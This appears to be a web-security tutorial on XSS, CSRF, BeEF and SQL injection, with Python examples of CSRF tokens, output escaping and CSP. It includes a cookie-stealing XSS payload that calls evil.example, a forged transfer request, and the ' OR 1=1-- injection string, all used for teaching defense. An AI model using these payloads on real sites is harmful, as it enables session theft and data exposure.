Attackers, popularly known as black hat hackers, hunt for vulnerabilities that working exploits can be written for. Those exploits target either the web server or the user's browser, which is why they are categorized as "server side" and "client side" attacks.
The attacker does not always need to reach the user directly with a phishing link. If the web application is vulnerable enough, they can plant malicious code where the application itself will serve it: in the web server's web root, in a configuration file, or in a vulnerable input field whose contents are later rendered to other users (the stored form of cross-site scripting).
Cross-site Scripting (XSS)
If this happens on a website that handles sensitive user information such as financial data, that information can be stolen: the injected script runs in the victim's browser with the victim's session. In the worst case, an XSS payload can copy itself into every page or profile it touches and spread from user to user as a self-propagating XSS worm.
Another attack popular with attackers is cross-site request forgery (CSRF). Here the attacker does not steal or forge the session. Instead, a page under the attacker's control makes the victim's browser send a request to an application the victim is already logged in to, and the browser attaches the session cookie automatically. The application cannot tell the forged request from a legitimate one, so the attacker gets to act on the user's behalf: fraudulent transfers of funds, account setting changes such as a new password or e-mail address, and any other state-changing action the application exposes. CSRF by itself does not compromise the device or the browser; it abuses the trust the application places in the browser's cookies.
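The exchange described above, simulated end to end as an added example that is not part of the original article: a minimal bank transfer handler, a legitimate submission of the bank's own form, and a forged submission from a page on another origin that carries the victim's cookie but cannot carry the anti-CSRF token. The origin `https://bank.example`, the session id `sess-42` and the account balances are constructed for the example; the defense shown is the synchronizer-token pattern plus an Origin header check.

```python
import secrets

# Constructed server state for the example: one logged-in user, "alice".
SESSIONS = {}

ALLOWED_ORIGINS = {"https://bank.example"}  # assumption: the application's own origin


def login(session_id: str) -> None:
    """Start a session the way the bank would after a successful login."""
    SESSIONS[session_id] = {"user": "alice", "balance": 1000, "csrf_token": None}


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer-token pattern: a random secret stored in the server-side
    session and embedded as a hidden field in every state-changing form the
    application renders. A page on another origin cannot read it (same-origin policy)."""
    token = secrets.token_urlsafe(32)
    SESSIONS[session_id]["csrf_token"] = token
    return token


def transfer_handler(request: dict, enforce_csrf: bool) -> tuple:
    """Minimal POST /transfer handler. `request` carries what a framework would
    expose: cookies, form body and the Origin request header."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, "not logged in"
    if enforce_csrf:
        # Layer 1: browsers set Origin on cross-site POSTs; it must be our own.
        if request["headers"].get("Origin") not in ALLOWED_ORIGINS:
            return 403, "cross-site request rejected by origin check"
        # Layer 2: the form must carry the token tied to this session.
        expected = session["csrf_token"] or ""
        supplied = request["form"].get("csrf_token", "")
        if not expected or not secrets.compare_digest(expected, supplied):
            return 403, "CSRF token missing or invalid"
    amount = int(request["form"]["amount"])
    session["balance"] -= amount
    return 200, f"sent {amount} to {request['form']['to']}"


def run_scenario(enforce_csrf: bool) -> dict:
    """Replay a legitimate and a forged transfer and report the outcomes."""
    login("sess-42")
    token = issue_csrf_token("sess-42")
    # The bank's own form: cookie, Origin and the hidden token all present.
    legit = {
        "cookies": {"session": "sess-42"},
        "headers": {"Origin": "https://bank.example"},
        "form": {"to": "bob", "amount": "100", "csrf_token": token},
    }
    # A page on evil.example auto-submits a form to the bank. The victim's browser
    # attaches the session cookie by itself; the attacker cannot supply the token.
    forged = {
        "cookies": {"session": "sess-42"},
        "headers": {"Origin": "https://evil.example"},
        "form": {"to": "mallory", "amount": "900"},
    }
    legit_status, _ = transfer_handler(legit, enforce_csrf)
    forged_status, _ = transfer_handler(forged, enforce_csrf)
    return {"legit": legit_status, "forged": forged_status,
            "balance": SESSIONS["sess-42"]["balance"]}


if __name__ == "__main__":
    print("no CSRF defense:  ", run_scenario(False))  # forged transfer succeeds, balance 0
    print("with CSRF defense:", run_scenario(True))   # forged transfer gets 403, balance 900
```

Without the check the forged request is indistinguishable from the real one and drains the account; with it, the attacker's page fails both layers. Marking the session cookie `SameSite=Lax` or `Strict` is a third, browser-enforced layer that the simulation does not model.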
A popular tool among attackers is the Browser Exploitation Framework (BeEF). BeEF provides a browser-based admin page from which the attacker controls hooked browsers and launches social-engineering modules against them. Before any of that can happen, the victim's browser has to load BeEF's hook script, for example by clicking a phishing link to a page that includes it, or through an XSS payload injected into a site the victim already visits. Loading the script "hooks" the browser: it polls the BeEF server for commands, giving the attacker control for as long as the hooked page stays open.
Once a browser is hooked, BeEF can be used for:
- Capturing webcam video or microphone audio (only if the user accepts the browser's permission prompt)
- Sending pop-up messages and fake notifications to the browser
- Redirecting the user to look-alike login pages that harvest credentials
- Viewing browser history, saved login credentials that the browser will autofill, and cookies that are not flagged HttpOnly
Here are a few screenshots of BeEF.
SQL Injection (SQLi)
Structured Query Language (SQL) injection lets an attacker run queries of their own choosing against your site's database, because user input is glued into the query text instead of being passed as a value. SQL injection targets relational databases such as MySQL/MariaDB, PostgreSQL, Oracle and SQL Server; NoSQL stores have their own, similarly shaped injection problems. These databases store information in databases, tables and columns, so what leaks may be a list of usernames, product IDs, or anything else the application's database account can read.
Here's an example of this kind of attack.
A payload such as ' OR 1=1-- typed into a login or search field works like this: the leading quote closes the string literal the application built around the input, OR 1=1 adds a condition that is always true, and -- comments out whatever the application appended after it. When the database is vulnerable, the query matches every row and returns the whole table. This payload can be tried in any input field whose value ends up in a query; a change in the response (extra rows, a database error message, a login that succeeds without a valid password) shows the field is injectable.
How Do I Mitigate XSS and Save my Browser?
The good news is that XSS can be mitigated. The core defense sits on the server side: treat every piece of user-controlled data as text rather than markup, and encode it for the context it is inserted into (HTML body, attribute, JavaScript, URL) at the moment it is output. Validating form fields on input is a useful second layer, but on its own it is not enough, because some fields legitimately need characters such as < or ', and because data can reach a page by routes other than the form.
How do I validate form fields? Web frameworks do most of this work. A typical example is Django's built-in form field classes: each field (IntegerField, EmailField, URLField and so on) checks that a submitted value is of the expected type, normalizes it to a sensible default representation, and rejects the submission otherwise. Django's template engine also escapes HTML by default when it renders a value, which is the output-encoding half of the defense.
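Both halves of that defense in plain Python, as an added example that is not from the original article or from Django: an allow-list validator for a field with a known shape (a username), and output encoding for a free-text field where validation cannot reasonably reject `<` or `&`. The profile fields, the username character set and the payload are constructed for the example.

```python
import html
import re

# Allow-list validator for a field that has a known shape (here: a username).
# Assumption for the example: 3 to 32 characters from a fixed alphabet.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")


def validate_username(value: str) -> str:
    """Reject anything outside the allow-list instead of trying to strip 'bad' characters."""
    if not USERNAME_RE.fullmatch(value):
        raise ValueError("username may contain only letters, digits, '.', '_' and '-'")
    return value


def render_profile_unsafe(display_name: str, bio: str) -> str:
    """Pastes user text straight into HTML: a <script> in either field runs in every viewer's browser."""
    return f'<h1>{display_name}</h1><p class="bio">{bio}</p>'


def render_profile(display_name: str, bio: str) -> str:
    """Encodes each value for the HTML body context at output time. The bio is free text,
    so validation cannot reject '<' or '&' there; escaping is what keeps it inert.
    Note html.escape covers HTML body and attribute contexts only, not JS or URL contexts."""
    return (f"<h1>{html.escape(display_name, quote=True)}</h1>"
            f'<p class="bio">{html.escape(bio, quote=True)}</p>')


# Constructed stored-XSS payload: exfiltrates the viewer's cookies to an attacker host.
XSS_PAYLOAD = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"


if __name__ == "__main__":
    try:
        validate_username(XSS_PAYLOAD)
    except ValueError as err:
        print("validation rejected the payload:", err)
    print(render_profile_unsafe("alice", XSS_PAYLOAD))     # script tag reaches the page intact
    print(render_profile("alice", XSS_PAYLOAD))            # shown as text, never executed
    print(render_profile("O'Brien & co", "I <3 security"))  # legitimate characters survive
```

Validation stops the payload at the username field, but only escaping protects the bio, and it does so without damaging legitimate input like `O'Brien & co`.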
On the client's side there are things you can do to avoid falling victim to XSS and to the social engineering that delivers it: don't click a link or open an attachment you haven't verified, don't give out personal information to websites, phone callers or strangers who message you out of the blue, and don't download software from less than legitimate sources.
Antivirus tools can't prevent every client-side XSS attack, because the payload is ordinary JavaScript served by a site the browser already trusts. This means vigilance on the user side still matters. Following these best practices keeps you safe in many scenarios, but not all of them.
Enterprises, however, can build stricter controls into the application itself. The browser's same-origin policy (SOP) is the baseline: it already stops a page on one origin from reading another origin's data. Cross-origin resource sharing (CORS) is the mechanism for relaxing SOP selectively, so it has to be configured carefully (never reflect arbitrary origins while allowing credentials). Content Security Policy (CSP) goes the other way and tightens things: a response header telling the browser which script sources are permitted, so an injected inline script is refused even when it reaches the page. Integrating these policies into the development process makes the application much more robust than one that relies on user vigilance alone.
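How a CSP header decides whether a script may run, as an added example that is not from the original article: a strict nonce-based policy beside a weak one that keeps `'unsafe-inline'`, a small parser for the header, and a simplified version of the browser's check for a single `<script>` element. The page URL, the nonce and the script sources are constructed for the example; the matcher handles `'self'`, `'none'`, `'unsafe-inline'`, nonces and exact origins, and leaves out wildcards, path matching and hashes.

```python
import secrets
from urllib.parse import urlsplit


def build_csp(nonce: str) -> str:
    """Strict policy: scripts only from our own origin or carrying this response's
    nonce; no plugins, no <base> hijacking, no framing by other sites."""
    return ("default-src 'self'; "
            f"script-src 'self' 'nonce-{nonce}'; "
            "object-src 'none'; base-uri 'none'; frame-ancestors 'none'")


# The weak setting: injected inline <script> is allowed to run.
WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline'"


def parse_csp(header: str) -> dict:
    """Split "directive src src; directive ..." into {directive: [sources]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0]] = parts[1:]
    return policy


def origin(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def script_allowed(policy: dict, page_url: str, src: str = None, nonce: str = None) -> bool:
    """Simplified browser decision for one <script>. src=None means an inline script.
    Per the CSP spec, 'unsafe-inline' is ignored once a nonce or hash source is present."""
    sources = policy.get("script-src", policy.get("default-src", []))
    if "'none'" in sources:
        return False
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in sources
    )
    if src is None:
        if "'unsafe-inline'" in sources and not has_nonce_or_hash:
            return True
        return nonce is not None and f"'nonce-{nonce}'" in sources
    if "'self'" in sources and origin(src) == origin(page_url):
        return True
    return origin(src) in sources  # exact origin listed in the policy


if __name__ == "__main__":
    page = "https://shop.example/account"
    nonce = secrets.token_urlsafe(16)  # fresh per response; the template stamps it on its own scripts
    strict = parse_csp(build_csp(nonce))
    weak = parse_csp(WEAK_CSP)
    print("Content-Security-Policy:", build_csp(nonce))
    print("injected inline script, strict:", script_allowed(strict, page))              # False
    print("template script with nonce:    ", script_allowed(strict, page, nonce=nonce))  # True
    print("own static file:               ", script_allowed(strict, page, src="https://shop.example/static/app.js"))
    print("attacker-hosted hook script:   ", script_allowed(strict, page, src="https://evil.example/hook.js"))
    print("injected inline script, weak:  ", script_allowed(weak, page))                # True
```

The point of the nonce is that an attacker who can inject markup into the page still cannot guess the per-response value, so their `<script>` is refused while the template's own scripts, which carry the nonce, keep working. Keeping `'unsafe-inline'` for convenience throws that protection away.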